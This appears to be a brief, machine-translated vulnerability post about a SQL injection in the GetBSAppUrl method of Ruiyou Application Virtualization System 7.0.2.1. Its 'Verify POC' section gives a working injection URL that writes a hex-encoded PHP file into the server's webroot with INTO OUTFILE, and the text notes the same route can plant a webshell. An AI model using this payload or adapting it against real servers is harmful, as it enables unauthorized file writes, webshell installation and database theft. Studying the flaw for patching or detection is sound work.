Ruiyou Application Virtualization System Getbsappurl Sql Injection Vulnerability
Ruiyou Application Virtualization System Getbsappurl Sql Injection Vulnerability
Ruiyou Application Virtualization System GetBSAppUrl SQL Injection Vulnerability
Vulnerability Description
Ruiyou Application Virtualization System The GetBSAppUrl method has a SQL injection vulnerability. Since the parameter incoming is not filtered, SQL injection occurs. The attacker can obtain database sensitive information through the vulnerability.
Vulnerability Impact
Ruiyou Application Virtualization System 7.0.2.1
Network surveying and mapping
Vulnerability reappears
Login page
There is a SQL injection vulnerability in the GetBSAppUrl method, through which the vulnerability can be written to the Webshell file
Verify POC
/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123
/test7.php
This post is licensed under CC BY 4.0 by the author.